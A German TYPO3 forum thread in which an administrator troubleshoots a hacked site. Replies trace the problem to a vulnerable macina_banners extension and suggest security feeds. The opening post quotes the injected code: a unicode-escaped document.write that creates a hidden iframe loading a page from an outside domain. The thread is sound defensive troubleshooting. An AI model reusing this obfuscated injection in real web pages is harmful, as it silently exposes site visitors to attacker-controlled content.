iframe oberhalb <!DOCTYPE html [Gelöst]


  • 0 x
    20. 06. 2007, 17:00

    Hallo,

    in einer Typo3-Installation habe ich seit gestern ein Problem. Ganz oben im Quellcode der Browserausgabe befindet sich ein Iframe:
    <script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\
    u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0061\u006c\u0065\u0078\u0061\u002d\u0072\u0061\u006e\u006b\u002e\u0069\u006e\u0066\u006f\
    u002f\u006c\u0069\u0062\u0072\u0061\u0072\u0069\u0065\u0073\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0020\u0073\
    u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\
    u0066\u0072\u0061\u006d\u0065\u003e');</script>
    <!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html ...

    Gut das kommt vermutlich über eine Lücke in Typo3 oder eine Extension rein.
    Ich finde aber nicht die Stelle wo dies im Typo3 Quelltext eingsetzt wurde. Mit find und grep habe ich sämtliche Verzeichnis im Webdoc danach durchsucht - ohne Ergebnis.
    Weis hier jemand weiter?

    MFG

  • ALCA74 ALCA74
    Padawan
    0 x
    50 Beiträge
    0 Hilfreiche Beiträge
    20. 06. 2007, 19:26 - Lösung

    Hallo Vigor

    Es muss nicht umdedingt im TYPO3 sein, es kann auch auf dem Server sein.
    Nimm doch mit der Hotline des Hosters Kontakt auf.

    Gruss
    ALCA


  • ALCA74 ALCA74
    Padawan
    0 x
    50 Beiträge
    0 Hilfreiche Beiträge
    20. 06. 2007, 17:43

    Hallo vigor

    Da wurde Deine Site gehackt.

    Lese mal diesen Artikel ([url]http://www.heise.de/security/artikel/49687[/url]) bei Heise durch, ist ziemlich gut geschrieben.

    Gruss
    ALCA


  • 0 x
    20. 06. 2007, 19:14

    Halo ALCA74,

    danke für den Hinweis. Dort ist beschrieben was da so alles ablaufen kann.
    Unklar ist hier die Lücke in Typo3 oder Extension.
    [b]Ich würde gerne wissen in welcher Script-Datei der Text eingefügt wurde,
    damit er ganz oben im Browserquelltext erscheinen kann.[/b]
    Es gibt eine typo3_src-Version, darin liegt die maßgebliche index.php,
    die wiederum enthält require (PATH_tslib.'index_ts.php'). Aber in dieser
    index_ts.php wird wiederum viel required und verarbeitet - was man sicher
    nicht auf die Schnelle blicken kann. Deshalb meine Frage.

    Grüße
    Vigor

    [quote="ALCA74"]
    Hallo vigor

    Da wurde Deine Site gehackt.

    Lese mal diesen Artikel ([url]http://www.heise.de/security/artikel/49687[/url]) bei Heise durch, ist ziemlich gut geschrieben.

    Gruss
    ALCA
    [/quote]

  • ALCA74 ALCA74
    Padawan
    0 x
    50 Beiträge
    0 Hilfreiche Beiträge
    20. 06. 2007, 19:26

    Hallo Vigor

    Es muss nicht umdedingt im TYPO3 sein, es kann auch auf dem Server sein.
    Nimm doch mit der Hotline des Hosters Kontakt auf.

    Gruss
    ALCA


  • 0 x
    20. 06. 2007, 19:42

    Hallo ALCA74,

    also ich bin der Linux-Administrator vom Server.
    Auf den anderen Vhosts auf dem Server besteht das Problem eben nicht.
    Auch auf dem Typo3-Vhost besteht das Problem auch nur bei Typo3.
    Deswegen frage ich auch ganz gezielt nach.

    Damit wir uns nicht falsch verstehen - ich administriere viele Linux-
    Server. Und das Problem mit sicherheitstechnisch unglücklichen PHP-
    Anwendungen habe ich öfters. Richtig wäre hier "löschen", Webanwendung
    neuinstallieren, Sec-Patches und/oder Updates der Anwendungen einspielen
    und neuaufbauen. Aber in diesem Fall geht organisatorisch nicht so einfach.

    Grüße
    Vigor

    [quote="ALCA74"]
    Hallo Vigor

    Es muss nicht umdedingt im TYPO3 sein, es kann auch auf dem Server sein.
    Nimm doch mit der Hotline des Hosters Kontakt auf.

    Gruss
    ALCA
    [/quote] :)

  • ttb ttb
    Jedi-Ritter
    0 x
    143 Beiträge
    0 Hilfreiche Beiträge
    21. 06. 2007, 21:46

    Schuld daran dürfte eine veraltete Version von macina_banners bzw. ric_rotation sein.

    Siehe http://www.typo3.net/forum/list/list_post//62569/ bzw. http://typo3.org/teams/security/security-bulletins/typo3-20070608-1/


  • 0 x
    22. 06. 2007, 12:47

    Hallo ttb,

    danke für die Info.
    Das macina_banners war in diesem Fall das Problem.
    Kennst Du eine Maillingliste, die schnell über Typo3/Ext Sicherheitsproblem
    infomiert?

    Grüße
    Vigor

  • Spyker Spyker
    Jedi-Meister
    0 x
    399 Beiträge
    0 Hilfreiche Beiträge
    22. 06. 2007, 13:21

    Der Feed gibt eine Menge Infos zu TYPO3.

    http://typo3blogger.de/

    Auch Sicherheitslücken werden dort gebloggt.

    BEste Grüße,
    Tim

  • just2b just2b
    TYPO3-Yoda
    0 x
    18741 Beiträge
    2 Hilfreiche Beiträge
    22. 06. 2007, 13:23

    rofl Tim, ist ja e deiner ;)

    da würde ich doch lieber die offiziellen feeds erwähnen, weil was ist, wenn du mal auf Urlaub oder kein interesse hast:

    Offizielle Feeds von typo3.org http://news.typo3.org/xml-feeds/

    georg


  • 0 x
    30. 06. 2007, 16:42

    Hallo!

    vielen Dank für die Antworten.
    Problem war macina_banners!
    Und die Feeds und Bloggs kann ich nun auch nutzen.

    Grüße
    Vigor